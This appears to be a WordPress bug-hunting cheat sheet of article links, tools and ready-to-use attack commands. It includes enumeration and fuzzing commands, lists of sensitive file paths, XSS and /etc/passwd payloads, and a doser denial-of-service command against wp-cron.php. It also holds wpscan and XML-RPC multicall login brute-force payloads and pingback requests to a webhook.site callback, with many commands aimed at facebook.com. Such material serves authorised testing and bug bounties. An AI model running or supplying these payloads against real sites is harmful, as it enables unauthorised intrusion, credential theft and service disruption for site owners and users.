Resources
- By Medium : https://infosecwriteups.com/mastering-wordpress-bug-hunting-a-complete-guide-for-security-researchers-3ff7ee4413a2 || https://infosecwriteups.com/pwning-wordpress-passwords-2caf12216956 || https://systemweakness.com/how-to-get-a-reverse-shell-from-any-wordpress-d12e2f7a3033 || https://thegrayarea.tech/p1-bug-hunting-exploiting-common-wordpress-vulnerabilities-28046f85c588 || https://hossamshady.medium.com/advanced-level-for-wordpress-vulnerabilities-e93144e3a8f3 || https://systemweakness.com/hacking-wordpress-server-database-f6cc6c116057 || https://medium.com/@olger346/hacking-wordpress-with-some-common-vulnerabilities-256bd2c251f6 || https://medium.com/@nguhuynh/how-did-i-get-200-with-wordpress-vulnerability-4ce80f106709 || https://riteshgohil-25.medium.com/ato-of-wordpress-website-4-digits-bounty-in-5-minute-cc888c4054c9 || https://medium.com/hengky-sanjaya-blog/scan-wordpress-vulnerability-with-wpscan-b2de6c3de65c || https://infosecwriteups.com/how-to-hack-a-wordpress-website-with-wpscan-85481309dd73
- By habr : https://habr.com/ru/articles/728294/
- By hackingarticles : https://www.hackingarticles.in/penetration-testing-lab-setup-wordpress/ || https://www.hackingarticles.in/wpscanwordpress-pentesting-framework/ || https://www.hackingarticles.in/wordpress-reverse-shell/
- By RedNexus : https://www.youtube.com/watch?v=gd9-nqFRT2Q
- By 0xma : https://0xma.github.io/hacking/wordpress_theme_edit.html
- By smaranchand : https://smaranchand.com.np/2020/04/misconfigured-wordpress-takeover-to-remote-code-execution/
- By hackertarget : https://hackertarget.com/attacking-wordpress/
- By invicti : https://www.invicti.com/blog/web-security/xml-rpc-protocol-ip-disclosure-attacks/
- hacker1 : https://hackerone.com/reports/124097 // https://hackerone.com/reports/124097
Cheat sheets
- Hacking Wordpress : https://github.com/cyberteach360/Hacking-Wordpress
- By haax.fr :https://cheatsheet.haax.fr/web-pentest/content-management-system-cms/wordpress/
- hacktricks : https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-web/wordpress.html
- By exploit-notes : https://exploit-notes.hdks.org/exploit/web/cms/wordpress-pentesting/
Commands
- Enumeration
- Scaning
- General
nuclei -u https://facebook.com/ nuclei -u https://facebook.com -t ./wp-login-register-detect.yaml nuclei -u https://facebook.com -tags wordpress wpscan --rua -e vp,vt,tt,cb,dbe,u --url https://www.facebook.com/--api-token gph_lasdsadifjsdf2389fjwde92dufhwsdfe89fh234w python3 cmsmap.py -s https://www.facebook.com/ -F echo "facebook.com" | waybackurls
- General
- Files
- General
feroxbuster -u https://facebook.com -x php,cgi,htm,html,shtm,shtml,js,txt,bak,zip,old,conf,log,pl,asp,aspx,jsp,sql,db,sqlite,mdb,tar,gz,7z,rar,json,xml,yml,yaml,ini,java,py,rb,php3,php4,php5 --random-agent --depth 3 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -t 100 -C 404 --redirects --rate-limit 10 -E -B -g -o fero.json --json # Subdomains cat sub.txt | feroxbuster --stdin -w /usr/share/wordlists/seclists/Discovery/Web-Content/CMS/wordpress.fuzz.txt -x php --smart --random-agent --json -o Fero.json - Usernames
# Default REST API endpoint /wp-json/wp/v2/users # Common bypasses /wp-json/wp/v2/users/n /wp-json/?rest_route=/wp/v2/users/ /wp-json/?rest_route=/wp/v2/users/n /index.php?rest_route=/wp/v2/users /index.php?rest_route=/wp/v2/users/n # With query parameters /wp-json/wp/v2/users?page=1 /wp-json/wp/v2/users/?per_page=100 /wp-json/wp/v2/users/?orderby=id&order=asc /wp-json/wp/v2/users?search=admin /wp-json/wp/v2/users?search=editor # Direct user ID probing /wp-json/wp/v2/users/1 /wp-json/wp/v2/users/2 /wp-json/wp/v2/users/9999 # Legacy or alternative endpoints /wp-json/users /wp-json/wp/v2/users.json /?rest_route=/wp/v2/users /?rest_route=/wp/v2/users/1 - Configrations & Dirs
# Main WordPress configuration file /wp-config.php /wp-config.php.bak /wp-config.php.save /wp-config.php.old /wp-config.php.orig /wp-config.php~ /wp-config.php.txt /wp-config.php.zip /wp-config.php.tar.gz /wp-config.php.backup # Environment files /.env /.env.bak /.env.old /.env.save /.env.example /.env.local # Backup & archive leaks /backup.zip /backup.tar.gz /db.sql /database.sql /dump.sql /wordpress.zip /wordpress.tar.gz /website-backup.zip /site-backup.tar.gz # Other sensitive config files /wp-config-sample.php /.htaccess /.htpasswd /phpinfo.php /config.json /config.php /config.php.bak /robots.txt /xmlrpc.php /wp-cron.php /wp-login.php /wp-admin.php /license.txt /wp-activate.php /wp-admin/login.php /wp-admin/wp-login.php /login.php /wp-sitemap.xml /test.php - Regestration Page
# Nucli Templete id: setup-wp info: name: wp setup author: ELSFA7110 severity: critical reference: https://twitter.com/sec715/status/1397924997457317897 tags: rce,exposure requests: - method: GET path: - "{{BaseURL}}//wp-admin/setup-config.php?step=1" nuclei -u https://facebook.com -t ./wp-login-register-detect.yaml - WordPress Setup
wget https://facebook.com/wp-admin/setup-config.php?step=1 # nucli templet https://github.com/coffinxp/nuclei-templates/blob/main/wp-setup-config.yaml - Admin-AJAX
# Xss templete https://domain.com/wp-admin/admin-ajax.php?action=tie_get_user_weather&options={'location'%3A'Cairo'%2C'units'%3A'C'%2C'forecast_days'%3A'5<%2Fscript><script>alert(document.domain)<%2Fscript>custom_name'%3A'Cairo'%2C'animated'%3A'true'} https://domain.com/wp-content/themes/ambience/thumb.php?src=<body onload=prompt(1)>.png # RCE templete https://domain.com/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
- General
- Scaning
- Exploitation
- Dos
doser -t 10000 -p 'https://www.facebook.com/wp-cron.php' - Bruteforce (Login)
creds search phpmyadmin => pip3 install defaultcreds-cheat-sheet # WPScan brute force (single username) wpscan --url https://target.com --username admin --passwords /path/to/passwords.txt --disable-tls-checks # WPScan brute force (multiple usernames) wpscan --url https://target.com --usernames /path/to/usernames.txt --passwords /path/to/passwords.txt --disable-tls-checks # WPScan brute force via XML-RPC wpscan --url https://target.com --usernames admin --passwords /path/to/passwords.txt --disable-tls-checks --max-threads 10 - XMLRPC
- List Methods
<methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall> - Pingback
- IP disclure & Dos attack
<methodCall> <methodName>pingback.ping</methodName> <params> <param> <value><string>https://webhook.site/777e9d9c-c786-472e-a042-af72e1111084</string></value> </param> <param> <value><string>https://www.facebook.com/en/news-post/unveiling-the-depths-african-coastal/</string></value> </param> </params> </methodCall> - XSPA (Cross Site Port Attack)
<?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>pingback.ping</methodName> <params> <param> <value><string>https://website:port></string></value> </param> <param> <value><string>https://<SOME VALID BLOG FROM THE SITE>/</string></value> </param> </params> </methodCall>
- IP disclure & Dos attack
- wp.getUsersBlogs
- Login Bruteforce
<?xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>username</value></param> <param><value>password</value></param> </params> </methodCall>-
Multicall (To SpeedUP)
<?xml version="1.0"?> <methodCall><methodName>system.multicall</methodName><params><param><value><array><data> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\{\{ Your Username \}\}</string></value><value><string>\{\{ Your Password \}\}</string></value></data></array></value></data></array></value></member></struct></value> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\{\{ Your Username \}\}</string></value><value><string>\{\{ Your Password \}\}</string></value></data></array></value></data></array></value></member></struct></value> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\{\{ Your Username \}\}</string></value><value><string>\{\{ Your Password \}\}</string></value></data></array></value></data></array></value></member></struct></value> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>\{\{ Your Username \}\}</string></value><value><string>\{\{ Your Password \}\}</string></value></data></array></value></data></array></value></member></struct></value> </data></array></value></param></params></methodCall>
-
- Login Bruteforce
- List Methods
- Dos
Tools
- CMSmap :https://github.com/Dionach/CMSmap
- wpscan : https://github.com/wpscanteam/wpscan
- nikto : https://github.com/sullo/nikto
- nuclei : https://github.com/projectdiscovery/nuclei
- waybackurls : https://github.com/tomnomnom/waybackurls
- doser : https://github.com/Quitten/doser.go
- Fast-Google-Dorts-Scan : https://github.com/IvanGlinkin/Fast-Google-Dorks-Scan
- fuzzuli : https://github.com/musana/fuzzuli
- dvwp : https://github.com/vavkamil/dvwp
Wordlist
- Wordpress-BruteForce-List : https://github.com/kongsec/Wordpress-BruteForce-List
- Bugy-Bounty-Wordlists : https://github.com/Karanxa/Bug-Bounty-Wordlists/tree/main
- coffin_wp-fuzz : https://github.com/coffinxp/payloads/blob/main/coffin%40wp-fuzz.txt